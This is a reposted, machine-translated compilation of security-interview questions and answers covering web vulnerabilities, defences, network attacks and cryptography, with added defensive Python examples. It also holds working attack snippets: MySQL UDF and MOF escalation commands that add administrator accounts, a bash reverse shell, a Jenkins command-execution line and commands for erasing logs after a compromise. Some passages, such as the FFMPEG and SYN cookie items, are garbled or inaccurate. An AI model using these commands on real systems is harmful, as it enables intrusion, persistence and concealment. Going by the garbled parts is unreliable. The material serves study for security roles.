Manual approach: look for sinks such as document.write, innerHTML and outerHTML assignments, window.location operations, javascript: URLs, and direct execution functions such as eval, setTimeout and setInterval. Find the variables they receive, trace them back to their sources to see whether they are attacker-controlled, and check whether they pass through a sanitising function on the way. For automated testing see Brother Dao's blog: the idea is to start from the inputs, follow how the variables propagate, and finally check whether they reach a dangerous function and whether a safe function sits in between. This needs a JavaScript parser, otherwise content introduced through JavaScript execution is missed.

When answering this question, bear in mind that in practice detection follows the specific function of each feature plus experience and intuition; there is no detailed standard for detecting each XSS type, so this answer is only a rough outline.

4. How to quickly discover the location of XSS

5. Suggestions for fixing XSS

Input checks: validate user input, filter or encode sensitive characters, and check the format of typed data. Input checks are best done on the server side.

Output checks: encode every variable when it is written into an HTML page, using the encoder that matches the context. In HTML content, HTML-encode. Inside a JavaScript block, JavaScript-encode: put every such variable in quotes and escape the dangerous characters so the data cannot break out of the quotes and become code. A stricter option is to hex-encode every character that is not alphanumeric. Note that the browser parses HTML before JavaScript, so the order of encodings must be chosen carefully. The defence therefore differs by output point; this may be summarised in a later article.

In addition, HttpOnly cookies limit cookie theft.
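An added example (Python, not code from the original page) of the two output-point encoders described above: entity encoding for HTML content, and the strict \xHH / \uHHHH form for a value placed inside a JavaScript string literal. render_profile() and its two output points are constructed for the example.

```python
import html


def encode_html(value: str) -> str:
    """For a value written into HTML text or a quoted attribute: & < > " and '
    become entities (HTML-encoding in the text above)."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """For a value written inside a quoted JavaScript string literal: every
    character except A-Z a-z 0-9 becomes \\xHH (or \\uHHHH above U+00FF), the
    strict form the text recommends. Quotes, backslashes, newlines and the
    sequence </script> can then never terminate the literal or the script."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp <= 0xFF:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def js_decode(encoded: str) -> str:
    """What the JavaScript engine sees after parsing the literal; used here to
    show that the round trip is lossless. The encoded form is pure ASCII."""
    return encoded.encode("ascii").decode("unicode_escape")


def render_profile(username: str) -> str:
    """Two output points for the same untrusted value, each with the encoder
    that matches its context. Using encode_html() inside the script would
    leave a quote as &#x27; (wrong data), and encode_js_string() inside the
    <p> would print backslash sequences (wrong data): the context decides."""
    return (f"<p>Hello, {encode_html(username)}</p>\n"
            f"<script>var user = '{encode_js_string(username)}';</script>")


if __name__ == "__main__":
    for payload in ("</script><script>alert(1)</script>", "'; alert(1); //", "O'Neil"):
        print(render_profile(payload))
        print()
```

The HTML parser runs first, so the only way a value inside the script block could break out is through a literal </script>; hex-encoding the angle brackets removes that path, and the engine still decodes \x3c back to < when it evaluates the string.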

6. Conditions for an XSS worm

Normally an XSS worm needs the XSS point to be on a page that is not only the victim's own ("self") page, that is, a page involved in interaction between users.
Stored XSS is not strictly required.

11. CSRF

1. CSRF principle

CSRF is a cross-site request forgery attack. The request is initiated from the client, and the attack works because the server does not confirm, when executing a key operation, whether the request was voluntarily initiated by the user.

2. Defense

Verify the Referer
Add a token

3. Compare token and referer horizontally. Which one has higher security level?

The token has the higher security level, because the server cannot always obtain the Referer: when jumping from HTTPS to HTTP the Referer is not sent, and in some versions of Flash the Referer could be customized. For the token, it must be random enough and must not leak (the principle of unpredictability).

4. From what angle should the Referer be verified? What problems arise, and how are they prevented?

When verifying the Referer in the header, two problems arise: an empty Referer, and a Referer check whose filtering or detection is incomplete. To prevent this, the regular expression used in the verification whitelist must be written carefully.

5. Regarding tokens, which aspects of tokens will be paid attention to, and which aspects of tokens will be tested?

Quoting an answer from a senior:

Attacks on tokens include, first, attacking the token itself: replaying it, analysing the encryption rules, verifying whether the verification method is correct, etc.; second, combining with information-leakage vulnerabilities to obtain it and launching combined attacks; the token may leak through the cache, logs, GET parameters, or via cross-site scripting.
Many jump (redirect) logins rely on tokens. If there is a jump vulnerability and reflected cross-site scripting, they can be combined into login hijacking.
In addition, tokens can be combined with other business logic: how can the token be bypassed if the security design is poor, such as stealing red envelopes and so on?
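The defence and the Referer pitfalls from questions 2 to 4 above, as an added example (not code from the original post): an unpredictable session-bound token compared in constant time, the prefix-style Referer check the text warns about beside a whitelist check on the parsed host, and both combined. The host bank.example and the session/form/header dictionaries are constructed for the example.

```python
import hmac
import secrets
from typing import Mapping, Optional
from urllib.parse import urlsplit

# Constructed: the host(s) from which state-changing requests may originate.
ALLOWED_HOSTS = {"bank.example"}


def issue_token(session: dict) -> str:
    """Generate an unpredictable token and bind it to the server-side session."""
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    session["csrf_token"] = token
    return token


def check_token(session: Mapping, submitted: Optional[str]) -> bool:
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)  # constant-time compare


def referer_check_weak(referer: Optional[str]) -> bool:
    """The badly written prefix check the text warns about, kept for
    contrast only: https://bank.example.attacker.test/ passes it."""
    return bool(referer) and referer.startswith("https://bank.example")


def referer_check(referer: Optional[str]) -> bool:
    """Parse the Referer and compare the whole host against the whitelist.
    An empty Referer is rejected rather than let through."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


def accept_state_change(session: Mapping, form: Mapping, headers: Mapping) -> bool:
    """Both checks must pass: the token is the primary control, the Referer
    whitelist is defence in depth."""
    return (check_token(session, form.get("csrf_token"))
            and referer_check(headers.get("Referer")))
```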

11. SSRF

SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker constructs a request that is then initiated by the server. Typically, SSRF attacks target internal systems that are inaccessible from the external network (precisely because the request is initiated by the server, it can reach internal systems that are connected to the server but isolated from the outside).

Most SSRF vulnerabilities arise because the server provides a function that fetches data from other server applications without filtering or restricting the target address: for example, fetching the text of a web page from a specified URL, loading an image from a specified address, downloading a file, and so on.

1. Detection

Verification method for SSRF vulnerability:

1) Because SSRF is a vulnerability that makes the server send requests, we can determine whether one exists by capturing packets and analysing whether the request is sent by the server.

2) Look for fetched resource addresses in the page source. If the address has the form www.baidu.com/xxx.php?image=(address), there may be an SSRF vulnerability.

2. Causes and defense bypasses of SSRF vulnerabilities

Cause: the server makes requests for resources on other servers without checking their legitimacy.
Exploitation: probe with a crafted intranet IP, or use other supported protocols to attack other services.
Defense: prohibit redirects, restrict protocols, separate internal and external networks, restrict URLs.
Bypass: use other protocols, IP bypasses (alternative IP formats), adding extra characters to the URL, malicious URLs, @ in the URL, and so on; 301 redirect + DNS rebinding.
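The defence side of this answer, as an added example (not code from the original post): a validator that restricts the protocol, rejects the @ userinfo trick, resolves the host once, rejects every internal answer (loopback, RFC 1918, link-local, IPv4-mapped IPv6) and returns a pinned IP so that the 301 + DNS-rebinding bypass has nothing to rebind. The resolver is injectable; the hostnames in the test are constructed.

```python
import ipaddress
import socket
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def system_resolver(host: str) -> List[str]:
    """Resolve with the OS resolver and return every A/AAAA answer."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_internal(ip: str) -> bool:
    """True for loopback, RFC 1918 / ULA, link-local (cloud metadata lives
    at 169.254.169.254), multicast, reserved and unspecified addresses.
    Raises ValueError if the string is not a parsable address."""
    addr = ipaddress.ip_address(ip)
    mapped = getattr(addr, "ipv4_mapped", None)  # ::ffff:127.0.0.1 -> 127.0.0.1
    if mapped is not None:
        addr = mapped
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def pin_outbound_url(url: str,
                     resolver: Callable[[str], List[str]] = system_resolver
                     ) -> Tuple[str, str, int, str]:
    """Validate a user-supplied URL; return (host, pinned_ip, port, path) or
    raise ValueError. The caller must connect to pinned_ip (sending
    'Host: host') and must not follow redirects unless each redirect target
    is passed through this function again."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:  # file:, gopher:, dict:, ftp: ...
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in URL (the '@' trick) not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if scheme == "https" else 80)
    # Resolve exactly once and check every answer (a rebinding host may
    # return one public and one internal address). Most system resolvers
    # normalise spellings such as 127.1 or 2130706433; anything the
    # ipaddress module cannot parse is rejected by the ValueError it raises.
    answers = resolver(host)
    if not answers:
        raise ValueError(f"cannot resolve {host!r}")
    for ip in answers:
        if is_internal(ip):
            raise ValueError(f"{host!r} resolves to internal address {ip}")
    return host, answers[0], port, parts.path or "/"
```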

12. Upload

1. Principle of file upload vulnerability

Because the programmer insufficiently controls or incorrectly processes user file uploads, a user can upload executable dynamic script files to the server beyond their own permissions.

2. Common upload bypass methods

Front-end JS verification: disable JS, or modify the request with Burp
Case variation of the extension
Double suffix
Filter bypass: pphphp -> php

3. Protection

Set the file upload directory to be non-executable.
Use a whitelist to determine the file upload type.
Rewrite the file name and path with random numbers.

4. What is the significance of reviewing the elements of the upload point?

On some sites the restriction on uploaded file types is implemented on the front end. In this case, simply adding the desired file type to the front-end check (via the element inspector) breaks the restriction.
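The three protections from question 3 above, as an added example (not code from the original post): the single-pass blacklist that the pphphp->php bypass defeats, shown beside a case-insensitive extension whitelist that discards the client-supplied name entirely, so a double suffix such as shell.php.jpg cannot survive. UPLOAD_ROOT and the allowed extension set are constructed for the example.

```python
import os
import secrets

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
# Constructed: a directory the web server never executes scripts from.
UPLOAD_ROOT = "/srv/uploads"


def weak_blacklist(filename: str) -> str:
    """The flawed 'strip the bad word once' filter from the text, kept for
    contrast only: one replace() turns shell.pphphp back into shell.php."""
    return filename.replace("php", "")


def safe_stored_name(filename: str) -> str:
    """Whitelist the type and throw the client-supplied name away."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path part
    if "\x00" in base:
        raise ValueError("null byte in filename")
    name, dot, ext = base.rpartition(".")
    if not dot or not name:  # 'shell' or '.htaccess'
        raise ValueError("no extension")
    ext = ext.lower()  # .PHP / .pHp case tricks normalise to php and fail
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext}")
    # A random name with exactly one extension: shell.php.jpg is stored as
    # <random>.jpg, so no earlier suffix is left for a handler to match on.
    return secrets.token_hex(16) + "." + ext


def store_path(filename: str) -> str:
    """Final on-disk path: random name under the non-executable root."""
    return os.path.join(UPLOAD_ROOT, safe_stored_name(filename))
```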

13. File Contains

1. Principle

The application lets the server include files through functions such as include(), selecting the file to include by a dynamic variable, and the user can control that dynamic variable, so a script or code of the user's choosing is introduced.

2. Functions that cause files to be included

PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ... JSP/Servlet: java.io.File(), java.io.FileReader(), ... ASP: include file, include virtual

3. Local file inclusion

A vulnerability that can open and include local files is called a local file inclusion vulnerability.

14. Logical loopholes

1. Common logical loopholes in the financial industry

Considering financial businesses only, the main ones are: data tampering (of financial data, or of data on which some business decisions are based), over-claiming caused by race conditions or improper design, leakage of transaction/order information, horizontal privilege escalation to view other people's accounts or perform malicious operations, and bypassing of transaction or business steps.

15. Man-in-the-middle attack

A man-in-the-middle attack is a (lack of) mutual authentication attack: a vulnerability caused by the absence of mutual authentication between the client and the server during the SSL handshake.

Solutions to defend against man-in-the-middle attacks are usually based on the following technologies:

1. Public key infrastructure: PKI uses a mutual authentication mechanism in which the client verifies the server and the server verifies the client. In the two examples above only the server is verified, which leaves the SSL handshake vulnerable; if mutual authentication is used, it can basically provide stronger protection.

2. Delay test

Computations using complex cryptographic hash functions can introduce delays of tens of seconds; if both parties normally take 20 seconds to compute, but the whole exchange takes 60 seconds to reach the other party, this may indicate the presence of a third-party intermediary.

3. Use other forms of key exchange

ARP spoofing

principle

Each host has an ARP cache table that records the correspondence between IP addresses and MAC addresses, and LAN data transmission relies on the MAC address. The ARP cache mechanism has a flaw: when a host receives an ARP reply, it does not verify whether it ever sent an ARP request to the other host; it directly saves the IP-to-MAC mapping from the reply into its ARP cache table, replacing any existing entry for the same IP. In this way an attacker gains the possibility of eavesdropping on the data the host transmits.

protection

1. Statically bind the gateway MAC and IP address on the host (the default is dynamic), command: arp -s <gateway IP> <gateway MAC>

2. Bind the host MAC and IP address on the gateway

3. Use ARP firewall

16. DDOS

1. DDOS principle

Using reasonable (valid) requests to overload resources, making the service unavailable.

SYN flood principle

Forge a large number of source IP addresses and send a large number of SYN packets to the server. The server replies with SYN/ACK packets, but because the source addresses are forged, nothing responds; not receiving an answer, the server retries 3 to 5 times and waits one SYN timeout (usually 30 seconds to 2 minutes) before discarding the connection. The attacker sends a large number of SYN requests with such forged source addresses, so the server consumes a lot of resources (CPU and memory) handling these half-open connections and must keep retrying SYN+ACK to those IPs. In the end the server has no capacity left to answer normal connection requests, resulting in a denial of service.

CC attack principle

Continuously initiate normal requests to some application pages that consume large resources to achieve the purpose of consuming server-side resources.

2. DDoS protection

SYN Cookie, SYN Proxy, SafeReset and similar algorithms. The main idea of SYN Cookie is to assign a "cookie" to each IP address and count the access frequency of each IP address; if a large number of packets from the same IP address arrive within a short period, it is considered an attack and subsequent packets from that IP address are discarded.

17. Elevation of authority

Two ways to escalate privileges in MySQL

UDF privilege escalation, MOF privilege escalation

MySQL UDF privilege escalation

Requirements: 1. The target system is Windows (Win2000, ...). 2. For MySQL 5.1 or above, the udf.dll file must be placed in the lib\plugin folder of the MySQL installation directory before a custom function can be created. You can run select @@basedir; or show variables like '%plugin%'; in MySQL to find the installation path. Privilege escalation:

Create a function with an SQL statement. Syntax: CREATE FUNCTION <function name> (the function name can only be one from the following list) RETURNS STRING SONAME '<exported DLL path>';

create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user arsch arsch /add');
select cmdshell('net localgroup administrators arsch /add');

drop function cmdshell;

The lib\plugin directory does not exist by default, so we need to use a webshell to find the MySQL installation directory, create the lib\plugin folder in it, and then export the udf.dll file to that directory.

MySQL mof privilege escalation

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name  = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";
};

instance of __FilterToConsumerBinding
{
Consumer   = $Consumer;
Filter = $EventFilter;
};

Please change the command on line 18 before uploading.

2. Execute load_file and into dumpfile to export the file to the correct location.

select load_file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

After the execution is successful, you can add a normal user, then you can change the command, upload and export the execution to upgrade the user to administrator privileges, and then the 3389 connection will be ok.

18. Special loopholes

1. Struts2-045

2. Redis is not authorized

cause

By default, Redis binds to 0.0.0.0:6379, which exposes the Redis service to the public network. If authentication is not enabled, any user can access the Redis server without authorization and read its data. An attacker with unauthorized access to Redis can use Redis features to write a public key onto the server and then log in to the target directly with the corresponding private key.

Utilization conditions and methods

condition:

a. The redis service runs with the root account.
b. Redis has no password or weak password for authentication.
c. Redis listens on the 0.0.0.0 public network.

method:

a. Through the Redis INFO command, view server parameters and sensitive information, paving the way for the attacker's subsequent penetration.
b. Upload an SSH public key to obtain SSH login.
c. Obtain a reverse shell through crontab.
d. Use the slave master-slave mode.

repair

Password verification,
run with reduced privileges,
restrict the bound IP / change the port

3. Unauthorized access to Jenkins

An attacker reaches the script command execution interface through unauthorized access and executes attack instructions.

println "ifconfig -a".execute().text executes system commands; wget can then be used to download a webshell.

4. Unauthorized access to MongoDB

When the MongoDB service is started without any parameters, there is no permission verification by default and the database can be accessed remotely. Anyone connecting on the default port without a password can perform any high-risk operation on the database, such as adding, deleting, modifying and querying.

protection

1. Add authentication to MongoDB:
1) Add the --auth parameter when MongoDB starts.
2) Add a user to MongoDB:
use admin                         # use the admin database
db.addUser("root", "123456")      # add a user with username root and password 123456
db.auth("root", "123456")         # verify the user was added; a return value of 1 means success
2. Disable the HTTP and REST ports. MongoDB has its own HTTP service and supports a REST interface; after 2.6 these interfaces are closed by default. By default mongoDB listens for the web service on the default port. Remote management through the web is generally unnecessary, so it is recommended to disable it: pass --nohttpinterface at startup, or set nohttpinterface = true in the configuration file.
3. Restrict the bound IP. Add the parameter --bind_ip 127.0.0.1 at startup, or add the following to /etc/mongodb.conf: bind_ip = 127.0.0.1

5. Unauthorized access to Memcache

Memcached is a commonly used key-value caching system. Since it has no permission control module, a Memcached service open to the public network is easily scanned and discovered by attackers, who can then read sensitive information in Memcached directly through the command interface.

use

a. Log in to the machine and run netstat -an | more to check the listening ports. Output showing 0.0.0.0:11211 means Memcached listens on all interfaces, and the unauthorized access vulnerability exists.

b. telnet <target> 11211, or nc -vv <target> 11211: if the connection succeeds, the vulnerability exists.

Vulnerability hardening

a. Configure Memcached to allow local access only.
b. Block external network access to Memcached port 11211.
c. Add --enable-sasl when compiling to enable SASL authentication.

6. FFMPEG local file reading

principle

Encrypt the payload into a segment of bytes that will be executed when the encryption API is called. But in the actual answer for this item, I only mentioned the old SSRF hole, the m3u8 header, the offset, and the encryption.

19. Safety knowledge

1. WEB

Common WEB development JAVA frameworks

Struts, Spring. Common Java framework vulnerabilities: in fact, when the interviewer asked this, I wasn't quite sure what he was asking. I mentioned Struts2 045 and 048 and common Java deserialization. 045: the error handling introduces an OGNL expression. 048: while encapsulating the action there is a step that calls getStackValue, which recursively evaluates the OGNL expression. Deserialization: the object is introduced by means of the Apache Commons reflection mechanism and the overriding of readObject; in fact I can't remember the details... Then this part was over.

Same origin policy

The same-origin policy restricts documents from different origins from reading or setting the attribute content of the current document. Origins are distinguished by protocol, domain name, subdomain, IP and port; if any of these differ, the origins are different.

Jsonp security attack and defense technology, how to write Jsonp attack page

Security attack and defense content involving Jsonp

JSON hijacking, Callback can be defined, JSONP content can be defined, and Content-type is not json.

attack page

JSON hijacking, cross-domain hijacking of sensitive information; the page is similar to

function wooyun(v){
alert(v.username);
}

When the Content-Type is incorrect and the JSONP callback content can be defined by the caller, XSS can result. For JSONP, Flash and other applications, refer to Chuangyu's "JSONP security attack and defense technology".

2. PHP

Functions involved in command execution in php

Code execution: eval(), assert(), popen(), system(), exec(), shell_exec(), passthru(), pcntl_exec(), call_user_func_array(), create_function()

File reading: file_get_contents(), highlight_file(), fopen(), readfile(), fread(), fgetss(), fgets(), parse_ini_file(), show_source(), file(), etc.

Command execution: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()

Bypassing disable_functions in PHP safe mode

dl() functions, component vulnerabilities, environment variables.

PHP weak typing

When comparing with ==, the operands are first converted to the same type and then compared.

If a number is compared with a string, or strings with numeric content are compared, the string is converted to a number and the comparison is performed numerically.

A string starting with 0e (scientific notation) is therefore equal to 0.

3. Database

The location where various database files are stored

mysql:
/usr/local/mysql/data/ 
C:\ProgramData\MySQL\MySQL Server 5.6\Data\
oracle:$ORACLE_BASE/oradata/$ORACLE_SID/

4. System

How to clear logs

meterpreter: clearev

What logs need to be cleared after compromising a Linux server?

Web logs, such as Apache's access.log and error.log. Clearing the whole log is too obvious; generally sed is used for targeted deletion.

e.g. sed -i -e '/192.169.1.1/d'

Clearing the command history is likewise targeted deletion from ~/.bash_history

Clearing wtmp logs: /var/log/wtmp

Clearing the login log: /var/log/secure

LINUX

What commands check the current port connections? The differences, advantages and disadvantages of the netstat and ss commands

netstat -antp, ss -l

The advantage of ss is that it shows more, and more detailed, information about TCP and connection states, and it is faster and more efficient than netstat.

Common reverse shell commands? Which shell is usually used? Why?

bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

What information can be obtained through the /proc directory of the Linux system, and what security applications can this information have?

ls /proc

System information, hardware information, kernel version, loaded modules, and processes

In Linux systems, checking the configuration items of which configuration file can improve the security of SSH?

/etc/ssh/sshd_config

iptables configuration

How to view the last hundred lines of a file with one command

tail -n 100 filename

Windows

How to harden the Windows desktop working environment in a domain environment? Please give your thoughts.

5. Cryptography

Specific working steps of AES/DES

RSA algorithm

Encryption:
ciphertext = plaintext^E mod N

RSA encryption raises the plaintext to the power E and takes the remainder after dividing by N.
Public key = (E, N)

Decryption:
plaintext = ciphertext^D mod N
Private key = (D, N)

Three parameters: n, e1, e2

n is the product of two large prime numbers p and q.
Encryption mode of block cipher.
How to generate a secure random number?

Quoting a previous senior's answer, random numbers can be generated through some physical systems, such as voltage fluctuations, disk head seek time when reading/writing, the noise of electromagnetic waves in the air, etc.
SSL handshake process

Establish a TCP connection; the client sends an SSL request; the server processes it; the client sends random data encrypted with the public key; the server decrypts the random data with its private key and the two sides negotiate the secret; the server and client use that secret to derive the encryption algorithm and key, and then communicate normally. I had originally forgotten this part, but when I looked at SSL pinning earlier I seemed to have a picture of it in my mind. After struggling for a long time I still couldn't be sure, so I gave up...
What are the differences between symmetric encryption and asymmetric encryption, and what are they used in?

6、TCP/IP

TCP three-way handshake process and corresponding state transitions

(1) The client sends a SYN packet to the server, containing the port number used by the client and the initial sequence number x;
(2) After receiving the client's SYN, the server sends a TCP segment with both the SYN and ACK bits set, containing the acknowledgement number x+1 and the server's initial sequence number y;
(3) After receiving the server's SYN+ACK, the client returns an ACK segment with acknowledgement number y+1 and sequence number x+1, and a standard TCP connection is established.

The difference between TCP and UDP

TCP is connection-oriented, UDP is message-oriented. TCP demands many system resources; UDP has a simple structure. TCP guarantees data integrity and ordering; UDP does not.

The establishment process of HTTPS

a. The client sends a request to the server.
b. The server returns its certificate and public key; the public key is part of the certificate.
c. The client verifies the validity of the certificate and public key. If valid, it generates a shared secret key, encrypts it with the public key and sends it to the server.
d. The server decrypts it with its private key, uses the received shared key to encrypt data and sends it to the client.
e. The client decrypts the data with the shared key.
f. The SSL-encrypted channel is established.

7. Traffic analysis

Wireshark simple filtering rules

Filter by IP:

Source IP address: ip.src == 1.1.1.1; destination IP address: ip.dst == 1.1.1.1

Filter by port:

Port 80: tcp.port == 80; source port: tcp.srcport == 80; destination port: tcp.dstport == 80

Protocol filtering:

Just enter the protocol name, e.g. http for the HTTP protocol

HTTP mode filtering:

Filter GET/POST requests: http.request.method == "GET" or http.request.method == "POST"

8. Firewall

Briefly describe several basic configuration hardening items commonly used in routers, switches, firewalls and other network equipment, as well as configuration methods.

This article is reproduced from the Internet and has been deleted.


Origin blog.csdn.net/qq_30163677/article/details/130859459